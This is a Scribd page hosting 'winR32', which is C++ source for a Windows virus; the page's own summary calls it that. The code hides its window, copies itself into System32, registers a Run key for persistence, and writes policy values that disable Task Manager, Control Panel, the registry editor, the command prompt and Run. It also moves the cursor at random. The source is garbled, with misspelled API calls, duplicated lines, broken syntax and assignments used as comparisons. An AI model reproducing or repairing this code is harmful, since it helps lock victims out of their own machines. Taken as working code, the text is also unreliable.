Scribd Logo
Carica

Benvenuto in Scribd!

  • Win R32

    Caricato da

    Julio Rafael
    241 visualizzazioni3 pagine
    The document contains code for a virus that copies itself to the Windows directory and creates registry keys to block certain system tools. It defines strings for blocking the task manager, control panel, registry tools, command prompt, and programs from running. The main function copies the virus, creates a registry key, and blocks the defined tools. It then repeatedly moves the cursor randomly and recreates the registry key. Functions are included to get the Windows directory path, create the registry key, copy the virus file, and block the specified tools by modifying registry values.

    Descrizione originale:

    Titolo originale

    winR32

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Formati disponibili

    TXT, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    The document contains code for a virus that copies itself to the Windows directory and creates registry keys to block certain system tools. It defines strings for blocking the task manager, control panel, registry tools, command prompt, and programs from running. The main function copies the virus, creates a registry key, and blocks the defined tools. It then repeatedly moves the cursor randomly and recreates the registry key. Functions are included to get the Windows directory path, create the registry key, copy the virus file, and block the specified tools by modifying registry values.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    241 visualizzazioni3 pagine

    Win R32

    Caricato da

    Julio Rafael
    The document contains code for a virus that copies itself to the Windows directory and creates registry keys to block certain system tools. It defines strings for blocking the task manager, control panel, registry tools, command prompt, and programs from running. The main function copies the virus, creates a registry key, and blocks the defined tools. It then repeatedly moves the cursor randomly and recreates the registry key. Functions are included to get the Windows directory path, create the registry key, copy the virus file, and block the specified tools by modifying registry values.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 3

    #include <iostream.h> #include <windows.h> #include <stdio.

    h> void moverAleatorio(); int CrearKey(char *path); void copiarVirus(char *camino); char *getRuta(); void bloquear(char *bloqueo); char* char* char* char* char* bloqueoUno = "DisableTaskMgr"; bloqueoDos = "NoControlPanel"; bloqueoTres = "DisableRegistryTools"; bloqueoCuatro = "DisableCMD"; bloqueoCinco = "NoRun";

    int main(int argc, char* arg[]) { FreeConsole(); char *senda = getRuta(); char *senda = getRuta(); char path[256]; char pathD[256]; HMODULE nombre = GetModuleHandle(0); GetModuleFileName(nombre, pathD, 256); strcopy(path, senda); strcat(path, "\\windr32.exe"); copiarVirus(senda); crearKey(senda); bloquear(bloqueoUno); bloquear(bloqueoDos); bloquear(bloqueoTres); bloquear(bloqueoCuatro); bloquear(bloqueoCinco); while (true) { createKey(senda); //bloquear(bloqueoUno); //bloquear(bloqueoDos); //bloquear(bloqueoTres); bloquear(bloqueoCuatro); //bloquear(bloqueoCinco); if(pathD[8]==path[8])&&(pathD[20]==path[20])){ moverAleatorio() } } return 0; } void moverAleatorio() { int mx, my; mx = GetSystemMetrics(SM_CXSCREEN) + 1;

    my = GetSystemMetrics(SM_CYSCREEN) + 1; SetCursorPos(1 + (rand() %mx),1 + (rand() %my)); _sleep(2000); } char *getRuta() { char *ruta = getenv("windir"); strcat()ruta,"\\\System32\"); return ruta; } int crearKey(char *path) { int regkey, check; HKEY hkey; regkey = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\ \CurrentVersion\\Run", &hkey); if(regkey==0){ RegSetValueEx(HKEY)hkey, "windr32",0, REG_SZ, (byte*)path, strle n(path)); check = o; return check; } if(regkey!=0){ check = 1; return check; } } void copiarVirus(char *camino){ char path[256]; char nombre[] = "windr32"; strcat(nombre, ".exe"); strcat(camino, nombre); HMODULE exe = GetModuleHandle(0); GetModuleFileName(exe, path, 256); CopyFile(path, camino, false); } void bloquear(char *bloqueo){ try{ HKEY hBuffer = NULL, hMyKey = NULL; DwORD value = 1; if(bloqueo = "DisableCMD"){ if(RegOpenKeyEx(HKEY_CURRENT_USER, 0, KEY_WRITE,&hBuffer) == ERR OR_SUCCESS)){ if(RegCreateKeyEx(hBuffer, "Software\\Policies\\Microsoft\\Windo ws\\System", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS){ RegSerValueEx(hMyKey, bloqueo, 0, REG_DWORD, (BYTE*)&val ue, sizeof(DWORD)); RegCloseKey(hMyKey); } }

    } if(bloqueo = "DisableTaskMgr"){ if(RegOpenKeyEx(HKEY_CURRENT_USER, 0, KEY_WRITE,&hBuffer) == ERR OR_SUCCESS)){ if(RegCreateKeyEx(hBuffer, "Software\\Policies\\Microsoft\\Windo ws\\System", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS){ RegSerValueEx(hMyKey, bloqueo, 0, REG_DWORD, (BYTE*)&val ue, sizeof(DWORD)); RegCloseKey(hMyKey); } } } if(bloqueo = "NoRun"){ if(RegOpenKeyEx(HKEY_CURRENT_USER, 0, KEY_WRITE,&hBuffer) == ERR OR_SUCCESS)){ if(RegCreateKeyEx(hBuffer, "Software\\Policies\\Microsoft\\Windo ws\\System", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS){ RegSerValueEx(hMyKey, bloqueo, 0, REG_DWORD, (BYTE*)&val ue, sizeof(DWORD)); RegCloseKey(hMyKey); } } } if(bloqueo = "NoControlPanel"){ if(RegOpenKeyEx(HKEY_CURRENT_USER, 0, KEY_WRITE,&hBuffer) == ERR OR_SUCCESS)){ if(RegCreateKeyEx(hBuffer, "Software\\Policies\\Microsoft\\Windo ws\\System", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS){ RegSerValueEx(hMyKey, bloqueo, 0, REG_DWORD, (BYTE*)&val ue, sizeof(DWORD)); RegCloseKey(hMyKey); } } } if(bloqueo = "DisableRegistryTools"){ if(RegOpenKeyEx(HKEY_CURRENT_USER, 0, KEY_WRITE,&hBuffer) == ERR OR_SUCCESS)){ if(RegCreateKeyEx(hBuffer, "Software\\Policies\\Microsoft\\Windo ws\\System", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS){ RegSerValueEx(hMyKey, bloqueo, 0, REG_DWORD, (BYTE*)&val ue, sizeof(DWORD)); RegCloseKey(hMyKey); } } } } catch(...){ } }

    Potrebbero piacerti anche